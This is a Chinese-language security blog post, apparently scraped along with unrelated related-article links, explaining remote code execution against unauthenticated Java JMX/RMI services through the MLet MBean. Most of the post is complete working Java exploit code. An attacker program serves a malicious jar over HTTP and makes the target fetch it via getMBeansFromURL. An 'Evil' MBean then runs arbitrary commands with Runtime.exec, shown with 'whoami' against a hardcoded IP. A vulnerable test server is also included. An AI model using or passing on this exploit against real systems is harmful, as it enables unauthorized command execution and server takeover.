攻击者通过构造恶意的MBean,调用 getMBeansFromURL 从远程服务器获取 MBean,通过MLet标签提供恶意的MBean对象下载。

前提条件:

允许远程访问,没有开启认证 (com.sun.management.jmxremote.authenticate=false)

能够远程注册 MBean (javax.management.loading.MLet)

常见端口1099进行攻击,攻击过程参考第二篇链接地址。

攻击端:

import com.sun.net.httpserver.HttpExchange;

import com.sun.net.httpserver.HttpHandler;

import com.sun.net.httpserver.HttpServer;

import javax.management.MBeanServerConnection;

import javax.management.ObjectInstance;

import javax.management.ObjectName;

import javax.management.remote.JMXConnector;

import javax.management.remote.JMXConnectorFactory;

import javax.management.remote.JMXServiceURL;

import java.io.*;

import java.net.InetAddress;

import java.net.InetSocketAddress;

import java.util.HashSet;

import java.util.Iterator;

/**

 * Created by k1n9 on 2017/8/23.

 */

public class RemoteMbean {

    private static String JARNAME = "compromise.jar";

    private static String OBJECTNAME = "MLetCompromise1:name=evil,id=12";

    private static String EVILCLASS = "Evil";

    public static void main(String[] args) {

        try {

            //开启Http服务,提供带mlet标签的html和恶意MBean的jar包

            HttpServer server = HttpServer.create(new InetSocketAddress(4141), 0);

            server.createContext("/mlet", new MLetHandler());

            server.createContext("/" + JARNAME, new JarHandler());

            server.setExecutor(null);

            server.start();

            //这里可以改成args的参数就可以在命令行下使用了,JMX的ip,端口,要执行的命令

            connectAndOwn("192.168.20.112", "8888", "whoami");

            server.stop(0);

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

    static void connectAndOwn(String serverName, String port, String command) {

        try {

            //建立连接

            JMXServiceURL u = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + serverName + ":" + port + "/jmxrmi");

            System.out.println("URL: " + u + ", connecting");

            JMXConnector c = JMXConnectorFactory.connect(u, null);

            System.out.println("Connected: " + c.getConnectionId());

            MBeanServerConnection m = c.getMBeanServerConnection();

            ObjectInstance evil_bean = null;

            try {

                evil_bean = m.getObjectInstance(new ObjectName(OBJECTNAME));

            } catch (Exception e) {

                evil_bean = null;

            }

            if (evil_bean == null) {

                System.out.println("Trying to create bean...");

                ObjectInstance evil = null;

                try {

                    evil = m.createMBean("javax.management.loading.MLet", null);

                } catch (javax.management.InstanceAlreadyExistsException e) {

                    evil = m.getObjectInstance(new ObjectName("DefaultDomain:type=MLet"));

                }

                System.out.println("Loaded " + evil.getClassName());

                //调用 getMBeansFromURL 从远程服务器获取 MBean

                /*

                加载包含 MLET 标记的文本文件,这些标记定义了要添加到 MBean 服务器的 MBean。

                文本文件的位置由 URL 指定。

                使用 UTF-8 编码来读取文本文件。

                MLET 文件中指定的 MBean 将被实例化并在 MBean 服务器中注册。

                */

                Object res = m.invoke(evil.getObjectName(), "getMBeansFromURL",

                        new Object[] {String.format("http://%s:4141/mlet", InetAddress.getLocalHost().getHostAddress())},

                        new String[] {String.class.getName()}

                );

                HashSet res_set = (HashSet)res;

                Iterator itr = res_set.iterator();

                Object nextObject = itr.next();

                if (nextObject instanceof Exception) {

                    throw ((Exception)nextObject);

                }

                evil_bean = ((ObjectInstance)nextObject);

            }

            //调用恶意 MBean 中用于执行命令的函数

            System.out.println("Loaded class: " + evil_bean.getClassName() + " object " + evil_bean.getObjectName());

            System.out.println("Calling runCommand with: " + command);

            Object result = m.invoke(evil_bean.getObjectName(), "runCommand", new Object[]{command}, new String[]{String.class.getName()});

            System.out.println("Result: " + result);

        } catch (Exception e) {

            e.printStackTrace();

        }

    }

    static class MLetHandler implements HttpHandler {

        public void handle(HttpExchange t) throws IOException {

            /**

             * mlet 标签

             *

             * CODE = class | OBJECT = serfile

             * ARCHIVE = "archiveList"

             * [CODEBASE = codebaseURL]

             * [NAME = mbeanname]

             * [VERSION = version]

             * >

             * [arglist]

             *

             */

            String respone = String.format("<HTML><mlet code=%s archive=%s name=%s></mlet></HTML>", EVILCLASS, JARNAME, OBJECTNAME);

            System.out.println("Sending mlet: " + respone + "\n");

            t.sendResponseHeaders(200, respone.length());

            OutputStream os = t.getResponseBody();

            os.write(respone.getBytes());

            os.close();

        }

    }

    static class JarHandler implements HttpHandler {

        public void handle(HttpExchange t) throws IOException {

            System.out.println("Request made for JAR...");

            //这里的 compromise.jar 可以根据实际的路径来修改

            File file = new File("E:\\Struts2-Vulenv-master\\JndiExploit\\src\\compromise.jar");

            byte[] bytearray = new byte[(int)file.length()];

            FileInputStream fis = new FileInputStream(file);

            BufferedInputStream bis = new BufferedInputStream(fis);

            bis.read(bytearray, 0 , bytearray.length);

            t.sendResponseHeaders(200, file.length());

            OutputStream os = t.getResponseBody();

            os.write(bytearray, 0, bytearray.length);

            os.close();

        }

    }

}

EvilMBean.java

public interface EvilMBean {

    public String runCommand(String cmd);

}

Evil.java

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class Evil implements EvilMBean {

    @Override

    public String runCommand(String cmd) {

        try {

            Runtime rt = Runtime.getRuntime();

            Process proc = rt.exec(cmd);

            BufferedReader stdInput = new BufferedReader(new InputStreamReader(proc.getInputStream()));

            BufferedReader stdError = new BufferedReader(new InputStreamReader(proc.getErrorStream()));

            String stdout_err_data = "";

            String s;

            while ((s = stdInput.readLine()) != null) {

                stdout_err_data += s + "\n";

            }

            while ((s = stdError.readLine()) != null) {

                stdout_err_data += s + "\n";

            }

            proc.waitFor();

            return stdout_err_data;

        } catch (Exception e) {

            return e.toString();

        }

    }

}

服务器:

import javax.management.MBeanServer;

import javax.management.ObjectInstance;

import javax.management.ObjectName;

import javax.management.remote.JMXConnectorServer;

import javax.management.remote.JMXConnectorServerFactory;

import javax.management.remote.JMXServiceURL;

import java.io.IOException;

import java.lang.management.ManagementFactory;

import java.net.MalformedURLException;

import java.rmi.RemoteException;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

public class HelloAgentRemote {

    public static void main(String[] args) throws Exception {

        //创建MBeanServer

        MBeanServer mbs = ManagementFactory.getPlatformMBeanServer();

//        ObjectName helloName = new ObjectName("jmxBean:name=Evil");

        //注册MBean,client通过helloName来获取new Evil()对象

//         mbs.registerMBean(new Evil(), helloName);

        try {

            //这句话非常重要,不能缺少!注册一个端口,绑定url后,客户端就可以使用rmi通过url方式来连接JMXConnectorServer

            LocateRegistry.createRegistry(8888);

            JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://127.0.0.1:8888/jmxrmi");

            JMXConnectorServer cs = JMXConnectorServerFactory.newJMXConnectorServer(url, null, mbs);

            System.out.println("....................begin rmi start.....");

            cs.start();

            System.out.println("....................rmi start.....");

        } catch (MalformedURLException e) {

            e.printStackTrace();

        } catch (IOException e) {

            e.printStackTrace();

        }

    }

}

https://paper.tuisec.win/detail/28e1afa65b4ce86

https://www.secpulse.com/archives/6203.html

JMX RMI 攻击利用的更多相关文章

  1. 转:中间人攻击利用框架bettercap测试

    0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携.易扩展 0x02特点 提到中间人攻击,最知名 ...

  2. service:jmx:rmi:///jndi/rmi

    service:jmx:rmi:///jndi/rmi://ip:9889/jmxrmi http://stackoverflow.com/questions/2768087/explain-jmx- ...

  3. VisualVM 使用 service:jmx:rmi:///...无法连接linux远程服务器

    VisualVM 无法使用 service:jmx:rmi:///jndi/rmi:///jmxrmi 连接到 关闭远程机器的防火墙即可:service iptables stop 不关闭防火墙的解决 ...

  4. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  5. 中间人攻击利用框架bettercap测试

    0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携.易扩展 0x02特点 提到中间人攻击,最知名 ...

  6. Linux下中间人攻击利用框架bettercap测试

    0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携.易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 ...

  7. 错误: JMX 连接器服务器通信错误: service:jmx:rmi://***

    电脑没有空间了,正想清理一下硬盘空间,这时不知道金山毒霸啥时候装上了,就想把它卸载了,卸载的过程中看到有空间清理,随手一点,清理出了10个G,然后再打开idea运行项目就报出这个错. 错误: JMX ...

  8. Redis配置及攻击利用

    Redis配置及攻击利用 Redis及其安全配置 Redis介绍 redis默认会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样 ...

  9. discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造攻击利用与修复

    2018年12月9日,国内某安全组织,对discuz X3.2 X3.4版本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞是discuz 的用户前段SQL注入与请求伪造漏洞,也俗称SSRF漏洞,漏洞 ...

随机推荐

  1. VMware12创建新的虚拟机及设置硬件环境

    一.安装VMware虚拟机 http://jingyan.baidu.com/article/215817f78879c21edb142379.html?qq-pf-to=pcqq.group 二.创 ...

  2. Java面试中遇到的坑【填坑篇】

    看到大家对上篇<Java面试中遇到的坑>一文表现出强力的关注度,说明大家确实在面试中遇到了类似的难题.大家在文章留言处积极留言探讨面试中遇到的问题,其中几位同学还提出了自己的见解,我感到非 ...

  3. python去掉字符串中空格的方法

    1.strip():把头和尾的空格去掉 2.lstrip():把左边的空格去掉 3.rstrip():把右边的空格去掉 4.replace('c1','c2'):把字符串里的c1替换成c2.故可以用r ...

  4. vue2.0父子组件通信的方法

    vue2.0组件通信方法:props传值和emit监听.(.sync方法已经移除.详情请点击)(dispatch-和-broadcast方法也已经废弃) props方法传值:Props 现在只能单项传 ...

  5. HTML(5)基础

    1.html常用标签 <pre>...</pre>:标识预定义文本 <a>是anchor的缩写,<a>标签定义锚点和超链接,<a>常与hre ...

  6. 从零开始学习html(十二)CSS布局模型——上

    一.css布局模型 清楚了CSS 盒模型的基本概念. 盒模型类型, 我们就可以深入探讨网页布局的基本模型了. 布局模型与盒模型一样都是 CSS 最基本. 最核心的概念. 但布局模型是建立在盒模型基础之 ...

  7. DouPHP去除Powered by DouPHP版权的方法

    DouPHP标题版权修改:打开 include 目录下的 action.class.php 文件,搜索“Powered”找到下面一行代码: $page_title = ($titles ? $titl ...

  8. 敏捷团队的组织与管理--- MPD软件工作坊培训感想(下)

    注:由麦思博(MSUP)主办的2013年亚太软件研发团队管理峰会(以下简称MPD大会)分别于6月15及6月22日在北京.上海举办,葡萄城的部分程序员参加了上海的会议,本文是参会的一些感受和心得. 今年 ...

  9. MVC与单元测试实践之健身网站(三)-角色与权限

    管理员的维护功能完成后,还有权限和角色,三者构成权限系统.这里采用的RBAC是最经典.最简单的一种,权限-角色-管理员只能层层传递,并不能直接为管理员分配权限. 一 权限.角色管理 a) 权限 之前编 ...

  10. Android热修复之 - 阿里开源的热补丁

    1.1 基本介绍 我们先去github上面了解它https://github.com/alibaba/AndFix 这里就有一个概念那就AndFix.apatch补丁用来修复方法,接下来我们看看到底是 ...